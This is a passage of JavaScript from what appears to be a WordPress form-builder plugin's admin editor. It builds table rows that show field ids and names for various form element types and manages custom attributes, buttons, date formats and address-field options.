		case "type_recaptcha":
			
		{
			id_array=Array();
			id_array[0]='wd_recaptchaform_id_temp';
			break;
		}
		
		case "type_submit_reset":
			
		{
			id_array=Array();
			id_array[0]=x+'_element_submitform_id_temp';
			id_array[1]=x+'_element_resetform_id_temp';
			break;
		}
		
		case "type_page_break":
			
		{
			id_array=Array();
			id_array[0]='_div_between';
			break;
		}
	}
		
	for(q=0; q<id_array.length;q++)
	{
		id=id_array[q];
		var input=document.getElementById(id);
		if(input)
		{
			atr=input.attributes;
			for(i=0;i<30;i++)
				if(atr[i])
					{
						if(atr[i].name.indexOf("add_")==0)
						{
							input.removeAttribute(atr[i].name);
							i--;
						}
					}
				
			for(i=0;i<10;i++)
				if(document.getElementById("attr_name"+i))
				{
					try{input.setAttribute("add_"+document.getElementById("attr_name"+i).value, document.getElementById("attr_value"+i).value)}
					catch(err)
					{
						alert('Only letters, numbers, hyphens and underscores are allowed.');
					}
				}
		}
	}
}

function add_id_and_name(i,type)
{
	switch(type) {
		case 'type_text':{
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0 = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
			var edit_main_td0_1 = document.createElement('td');
				
			var br 	= document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");
				field_id.innerHTML = "Field id ";
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("size", "50");
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("value", "wdform_"+i+"_elementform_id_temp");
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");
				field_name.innerHTML = "Field name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("size", "50");
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("value", "wdform_"+i+"_elementform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			
			edit_main_td0_1.appendChild(field_id_text);
			edit_main_td0_1.appendChild(br1);
			edit_main_td0_1.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_tr0.appendChild(edit_main_td0_1);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			break;
		}
	
		case 'type_address': {
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0 = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.setAttribute("colspan", "2");
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");
				field_id.style.cssText = 'margin-right: 42px;';
				field_id.innerHTML = "Fields id ";
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("style", "width:380px");
				field_id_text.setAttribute("value",  "wdform_"+i+"_street1form_id_temp, wdform_"+i+"_street2form_id_temp, wdform_"+i+"_cityform_id_temp, wdform_"+i+"_stateform_id_temp, wdform_"+i+"_postalform_id_temp, wdform_"+i+"_countryform_id_temp");
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");
				field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("style", "width:380px");
				field_name_text.setAttribute("value", "wdform_"+i+"_street1form_id_temp, wdform_"+i+"_street2form_id_temp, wdform_"+i+"_cityform_id_temp, wdform_"+i+"_stateform_id_temp, wdform_"+i+"_postalform_id_temp, wdform_"+i+"_countryform_id_temp");
			
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(field_id_text);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			edit_main_td0.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);	
			break;
		}
	
		case 'type_name': {
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0 = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.setAttribute("colspan", "2");
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");
				field_id.style.cssText = 'margin-right: 42px;';
				field_id.innerHTML = "Fields id ";
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("style", "width:380px");
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");
				field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("style", "width:380px");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(field_id_text);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			edit_main_td0.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);
			refresh_id_name(i, type);
			break;
		}
	
		case 'type_radio': {
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0  = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.setAttribute("colspan", "2");
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");	
				field_id.style.cssText = 'margin-right: 42px;';
				field_id.innerHTML = "Fields id ";
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("style", "width:350px");
				field_id_text.setAttribute("value",  '');
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");	
				field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("style", "width:350px");
				field_name_text.setAttribute("value", '');
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(field_id_text);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			edit_main_td0.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);
			refresh_id_name(i, type);
			break;
		}
	
		case 'type_checkbox': {
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0 = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.setAttribute("colspan", "2");
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");	
				field_id.style.cssText = 'margin-right: 42px;';				
				field_id.innerHTML = "Fields id ";
			
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("style", "width:350px");
				field_id_text.setAttribute("value",  '');
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");		
				field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("style", "width:350px");
				field_name_text.setAttribute("value", '');
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(field_id_text);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			edit_main_td0.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);
			refresh_id_name(i, type);
			break;
		}
	
		case 'type_time': {
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0 = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
			var edit_main_td0_1 = document.createElement('td');
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");			
				field_id.innerHTML = "Fields id ";
			
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("size", "50");
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("value", "wdform_"+i+"_hhform_id_temp, wdform_"+i+"_mmform_id_temp, wdform_"+i+"_ssform_id_temp");
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");			
				field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("size", "50");
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("value", "wdform_"+i+"_hhform_id_temp, wdform_"+i+"_mmform_id_temp, wdform_"+i+"_ssform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(br1);
			edit_main_td0.appendChild(field_name);
			edit_main_td0_1.appendChild(field_id_text);
			edit_main_td0_1.appendChild(br);
			edit_main_td0_1.appendChild(field_name_text);
			
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_tr0.appendChild(edit_main_td0_1);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			break;
		}
	
		case 'type_date_fields':{
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0 = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
			var edit_main_td0_1 = document.createElement('td');
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");	
				field_id.innerHTML = "Fields id ";
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("size", "50");
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("value", "wdform_"+i+"_dayform_id_temp, wdform_"+i+"_monthform_id_temp, wdform_"+i+"_yearform_id_temp");
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");	
				field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("size", "50");
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("value", "wdform_"+i+"_dayform_id_temp, wdform_"+i+"_monthform_id_temp, wdform_"+i+"_yearform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			
			edit_main_td0_1.appendChild(field_id_text);
			edit_main_td0_1.appendChild(br1);
			edit_main_td0_1.appendChild(field_name_text);
			
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_tr0.appendChild(edit_main_td0_1);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);	
			break;
		}
	
		case 'type_captcha': {
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0 = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
			var edit_main_td0_1 = document.createElement('td');
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");	
				field_id.innerHTML = "Fields id ";
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("size", "50");
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("value", "wd_captcha_inputform_id_temp");
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");		
				field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("size", "50");
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("value", "captcha_inputform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(br1);
			edit_main_td0.appendChild(field_name);
			edit_main_td0_1.appendChild(field_id_text);
			edit_main_td0_1.appendChild(br);
			edit_main_td0_1.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_tr0.appendChild(edit_main_td0_1);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			break;
		}
	
	    case 'type_spinner': {
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0 = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
			var edit_main_td0_1 = document.createElement('td');
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");
				field_id.innerHTML = "Field id ";
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("size", "50");
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("value", "wdform_"+i+"_elementform_id_temp");
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");
				field_name.innerHTML = "Field name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("size", "50");
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("value", "wdform_"+i+"_elementform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			
			edit_main_td0_1.appendChild(field_id_text);
			edit_main_td0_1.appendChild(br1);
			edit_main_td0_1.appendChild(field_name_text);
			
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_tr0.appendChild(edit_main_td0_1);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			break;
		}
		
		case 'type_slider': {
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0 = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
			var edit_main_td0_1 = document.createElement('td');
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");
				field_id.innerHTML = "Field id ";
			
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("size", "50");
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("value", "wdform_"+i+"_elementform_id_temp");
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");
				field_name.innerHTML = "Field name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("size", "50");
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("value", "wdform_"+i+"_elementform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			
			edit_main_td0_1.appendChild(field_id_text);
			edit_main_td0_1.appendChild(br1);
			edit_main_td0_1.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_tr0.appendChild(edit_main_td0_1);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			break;
		}
		
		case 'type_range': {
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0 = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
			var edit_main_td0_1 = document.createElement('td');
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");
				field_id.innerHTML = "Fields id ";
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("style", "width:350px");
				field_id_text.setAttribute("value",  '');
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");
				field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("style", "width:350px");
				field_name_text.setAttribute("value", '');
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			
			edit_main_td0_1.appendChild(field_id_text);
			edit_main_td0_1.appendChild(br1);
			edit_main_td0_1.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_tr0.appendChild(edit_main_td0_1);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);			
			refresh_id_name(i, type);
			break;
		}	
			
		case 'type_grading': {
			var	edit_main_table = document.getElementById("edit_main_table");
			var edit_main_tr0 = document.createElement('tr');
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.setAttribute("colspan", "2");
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
				field_id.setAttribute("class", "fm-field-label");
				field_id.style.cssText = 'margin-right: 42px;';
				field_id.innerHTML = "Fields id ";
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("style", "width:350px");
				field_id_text.setAttribute("value",  '');
			
			var field_name = document.createElement('label');
				field_name.setAttribute("class", "fm-field-label");
				field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("style", "width:350px");
				field_name_text.setAttribute("value", '');
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(field_id_text);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			edit_main_td0.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);	
			refresh_id_name(i, type);
			break;
		}	
	}
}


function refresh_id_name(i, type)
{
	switch(type)
	{
		case 'type_radio':
		{
			document.getElementById('field_id').value='';
			jQuery('.change_pos').each(function() {
				var idi = jQuery(this)[0].id;
				document.getElementById('field_id').value	+='wdform_'+i+'_elementform_id_temp'+idi+', ';
			});
			a=document.getElementById('field_id').value.slice(0,-2);
			document.getElementById('field_id').value=a;
			document.getElementById('field_name').value	=i+'_element';

			break
		}
		case 'type_checkbox':
		{
			document.getElementById('field_id').value='';
			jQuery('.change_pos').each(function() {
				var idi = jQuery(this)[0].id;
				document.getElementById('field_id').value	+='wdform_'+i+'_elementform_id_temp'+idi+', ';
			});

			a=document.getElementById('field_id').value.slice(0,-2);
			document.getElementById('field_id').value	=a;
			document.getElementById('field_name').value	=a;

			break
		}
		case 'type_name':
		{
			document.getElementById('field_id').value = 'wdform_'+i+'_element_firstform_id_temp, wdform_'+i+'_element_lastform_id_temp';
			document.getElementById('field_name').value = 'wdform_'+i+'_element_firstform_id_temp, wdform_'+i+'_element_lastform_id_temp';
			
			if(document.getElementById(i+'_element_titleform_id_temp')) {
				document.getElementById('field_id').value = 'wdform_'+i+'_element_titleform_id_temp, ' + document.getElementById('field_id').value;
				document.getElementById('field_name').value = 'wdform_'+i+'_element_titleform_id_temp, ' + document.getElementById('field_name').value;
				
			}	
			
			if(document.getElementById(i+'_element_middleform_id_temp')) {
				document.getElementById('field_id').value	= document.getElementById('field_id').value + ',  wdform_'+i+'_element_middleform_id_temp';
				document.getElementById('field_name').value	= document.getElementById('field_name').value + ',  wdform_'+i+'_element_middleform_id_temp';
		
			}
			
			break;
		}
		case 'type_range':
		{
			document.getElementById('field_id').value='';
			for(k=0; k<2;k++)
			{
						
					document.getElementById('field_id').value	+='wdform_'+i+'_elementform_id_temp'+k+', ';
				
			}
			a=document.getElementById('field_id').value.slice(0,-2);
			document.getElementById('field_id').value	=a;
			document.getElementById('field_name').value	=a;

			break;
		}
		case 'type_grading':
		{
			document.getElementById('field_id').value='';
			for(k=0; k<50;k++)
			{
			
				if(document.getElementById(i+'_elementform_id_temp_'+k))
				{	
				
					document.getElementById('field_id').value	+='wdform_'+i+'_elementform_id_temp_'+k+', ';
				}
			}
			a=document.getElementById('field_id').value.slice(0,-2);
			document.getElementById('field_id').value	=a;
			document.getElementById('field_name').value	=a;

			break;
		}

	}

}

function add_attr(i, type)
{
	var el_attr_table=document.getElementById('attributes');
	j=parseInt(el_attr_table.lastChild.getAttribute('idi'))+1;
	w_attr_name[j]="attribute";
	w_attr_value[j]="value";
	var el_attr_tr = document.createElement('tr');
		el_attr_tr.setAttribute("id", "attr_row_"+j);
		el_attr_tr.setAttribute("idi", j);
	var el_attr_td_name = document.createElement('td');
		el_attr_td_name.style.cssText = 'width:100px';
	var el_attr_td_value = document.createElement('td');
		el_attr_td_value.style.cssText = 'width:100px';
	
	var el_attr_td_X = document.createElement('td');
	var el_attr_name = document.createElement('input');
		el_attr_name.setAttribute("type", "text");
		el_attr_name.setAttribute("class", "fm-field-choice");
		el_attr_name.setAttribute("value", w_attr_name[j]);
		el_attr_name.setAttribute("id", "attr_name"+j);
		el_attr_name.setAttribute("onChange", "change_attribute_name('"+i+"', this, '"+type+"')");	
		
	var el_attr_value = document.createElement('input');
		el_attr_value.setAttribute("type", "text");
		el_attr_value.setAttribute("class", "fm-field-choice");
		el_attr_value.setAttribute("value", w_attr_value[j]);
		el_attr_value.setAttribute("id", "attr_value"+j);
		el_attr_value.setAttribute("onChange", "change_attribute_value('"+i+"', "+j+", '"+type+"')");
	
	var el_attr_remove = document.createElement('img');
		el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
		el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
		el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
		
		el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", '"+type+"')");
	el_attr_table.appendChild(el_attr_tr);
	el_attr_tr.appendChild(el_attr_td_name);
	el_attr_tr.appendChild(el_attr_td_value);
	el_attr_tr.appendChild(el_attr_td_X);
	el_attr_td_name.appendChild(el_attr_name);
	el_attr_td_value.appendChild(el_attr_value);
	el_attr_td_X.appendChild(el_attr_remove);
	refresh_attr(i, type);

	jQuery('#edit_table').scrollTop( jQuery("#attributes").offset().top );	
}

function change_attribute_value(id, x, type)
{
	if(!document.getElementById("attr_name"+x).value)
	{
		alert('The name of the attribute is required.');
		return
	}
	
	if(document.getElementById("attr_name"+x).value.toLowerCase()=="style")
	{
		alert('Sorry, you cannot add a style attribute here. Use "Class name" instead.');
		return
	}
	
	refresh_attr(id, type);
}

function change_attribute_name(id, x, type)
{
	value=x.value;
	if(!value)
	{
		alert('The name of the attribute is required.');
		return;
	}
	
	if(value.toLowerCase()=="style")
	{
		alert('Sorry, you cannot add a style attribute here. Use "Class name" instead.');
		return;
	}
	
	if(value==parseInt(value))
	{
		alert('The name of the attribute cannot be a number.');
		return;
	}
	
	if(value.indexOf(" ")!=-1)
	{	
		var regExp = /\s+/g;
		value=value.replace(regExp,''); 
		x.value=value;
		alert("The name of the attribute cannot contain a space.");
		refresh_attr(id, type);
		return;
	}	
	
	refresh_attr(id, type);
	
}

function remove_attr(id, el_id,type)
{
	tr=document.getElementById("attr_row_"+id);
	tr.parentNode.removeChild(tr);
	refresh_attr(el_id, type);
}

function change_attributes(id, attr)
{
	
var div = document.createElement('div');
var element=document.getElementById(id);
	element.setAttribute(attr, '');
}

function add_button(i)
{
	edit_main_td4=document.getElementById('buttons');
	if(edit_main_td4.lastChild)
		j=parseInt(edit_main_td4.lastChild.getAttribute("idi"))+1;
	else
		j=1;
	var table_button = document.createElement('table');
	
	table_button.setAttribute("width", "100%");
	table_button.setAttribute("border", "0");
	table_button.setAttribute("id", "button_opt"+j);
	table_button.setAttribute("idi", j);
	var tr_button = document.createElement('tr');
	var tr_hr = document.createElement('tr');
	
	var td_button = document.createElement('td');
	var td_X = document.createElement('td');
	var td_hr = document.createElement('td');
	td_hr.setAttribute("colspan", "3");
	
	tr_hr.appendChild(td_hr);
	tr_button.appendChild(td_button);
	tr_button.appendChild(td_X);
	table_button.appendChild(tr_hr);
	table_button.appendChild(tr_button);
	
	var br1 = document.createElement('br');
	var hr = document.createElement('hr');
		hr.setAttribute("id", "br"+j);
	
	var el_title_label = document.createElement('label');
		el_title_label.setAttribute("class", "fm-field-label");
		el_title_label.setAttribute("for", "el_title"+j);
		el_title_label.innerHTML = "Button name";
	
	var el_title = document.createElement('input');
		el_title.setAttribute("id", "el_title"+j);
		el_title.setAttribute("type", "text");
		el_title.setAttribute("value", "Button");
		el_title.style.cssText = "width:140px; margin-left:33px;";
		el_title.setAttribute("onKeyUp", "change_label('"+i+"_elementform_id_temp"+j+"', this.value);");

	var el_func_label = document.createElement('label');
		el_func_label.setAttribute("class", "fm-field-label");
		el_func_label.setAttribute("for", "el_func"+j);
		el_func_label.innerHTML = "OnClick function";
	
	var el_func = document.createElement('input');
		el_func.setAttribute("id", "el_func"+j);
		el_func.setAttribute("type", "text");
		el_func.setAttribute("value", "");
		el_func.style.cssText =   "width:140px; margin-left:11px;";
		el_func.setAttribute("onKeyUp", "change_func('"+i+"_elementform_id_temp"+j+"', this.value);");
	
	var el_choices_remove = document.createElement('img');
		el_choices_remove.setAttribute("id", "el_button"+j+"_remove");
		el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
		el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
		el_choices_remove.setAttribute("align", 'top');
		el_choices_remove.setAttribute("onClick", "remove_button("+j+","+i+")");
	
	
	td_hr.appendChild(hr);
	td_button.appendChild(el_title_label);
	td_button.appendChild(el_title);
	td_button.appendChild(br1);
	td_button.appendChild(el_func_label);
	
	td_button.appendChild(el_func);
	td_X.appendChild(el_choices_remove);
	edit_main_td4.appendChild(table_button);
	
	element='button';	type='button'; 
	
	td2=document.getElementById(i+"_element_sectionform_id_temp");
	var adding = document.createElement(element);
		adding.setAttribute("type", type);
		adding.setAttribute("id", i+"_elementform_id_temp"+j);
		adding.setAttribute("name", i+"_elementform_id_temp"+j);
		adding.setAttribute("value", "Button");
		adding.innerHTML =  "Button";
		adding.setAttribute("onclick", "");
		
	td2.appendChild(adding);
	refresh_attr(i,'type_checkbox');
}

function remove_button(j,i)
{
	table=document.getElementById('button_opt'+j);
	button=document.getElementById(i+'_elementform_id_temp'+j);
	table.parentNode.removeChild(table);
	button.parentNode.removeChild(button);
}

function change_date_format(value, id, element)
{
	var input_p = document.getElementById(id+'_buttonform_id_temp');
	if(element == 'format') {
		var dis_past_days =  document.getElementById(id+'_dis_past_daysform_id_temp').value == 'yes' ? true : false;
		input_p.setAttribute("format", value);
	}
	else {
		document.getElementById(id+'_dis_past_daysform_id_temp').value = (value == true ? 'yes' : 'no');
		var dis_past_days = value == true ? true : false;
		var value = document.getElementById('date_format').value;
	}
	input_p.setAttribute("onclick", "return showCalendar('"+id+"_elementform_id_temp' , '"+value+"', "+dis_past_days+")");
		
}

function disable_past_days(value, id)
{
	var dis_past_days = value == true ? true : false;
	
	alert(dis_past_days);
	alert(document.getElementById(id+'_buttonform_id_temp'));
	var input_p = document.getElementById(id+'_buttonform_id_temp');
		input_p.setAttribute("onclick", "return showCalendar('"+id+"_elementform_id_temp' , '"+value+"')");
		input_p.setAttribute("format", value);
}

function set_send(id)
{	
if(document.getElementById(id).value=="yes")
	document.getElementById(id).setAttribute("value", "no")
else
	document.getElementById(id).setAttribute("value", "yes")
}

function change_class(x,id)
{
	if(document.getElementById(id+'_label_sectionform_id_temp'))
	document.getElementById(id+'_label_sectionform_id_temp').setAttribute("class",x);
	if(document.getElementById(id+'_element_sectionform_id_temp'))
	document.getElementById(id+'_element_sectionform_id_temp').setAttribute("class",x);
}

function set_required(id)
{	
	if(document.getElementById(id+"form_id_temp").value=="yes")
	{
		document.getElementById(id+"form_id_temp").setAttribute("value", "no");
		document.getElementById(id+"_elementform_id_temp").innerHTML="";
	}	
	else
	{
		document.getElementById(id+"form_id_temp").setAttribute("value", "yes")
		document.getElementById(id+"_elementform_id_temp").innerHTML=" *";
	}
}

function disable_fields(id,field)
{	
	var div = document.getElementById(id+"_div_address");
	if(field) {
		if(document.getElementById("el_"+field).checked==true)
			document.getElementById(id+"_disable_fieldsform_id_temp").setAttribute(field, "yes");
		else
			document.getElementById(id+"_disable_fieldsform_id_temp").setAttribute(field, "no");
	}
	
	
	if(document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute("state")=='yes')
		document.getElementById("el_us_states").disabled =true;	
	else {
		document.getElementById("el_us_states").disabled =false;
		if(field=='us_states')
		{		
			change_state_input(id,'form_id_temp');
			return;
		}
		
	}
	
	div.innerHTML='';

	var hidden_labels = new Array();
	var address_fields =['street1','street2','city','state','postal','country']
	var left_right=0;
		
	for(l=0; l<6; l++)
	{
		if(document.getElementById(id+'_disable_fieldsform_id_temp').getAttribute(address_fields[l])=='no')	
		{
			if(address_fields[l]=='street1' || address_fields[l]=='street2')    
			{  
				var street = document.createElement('input');
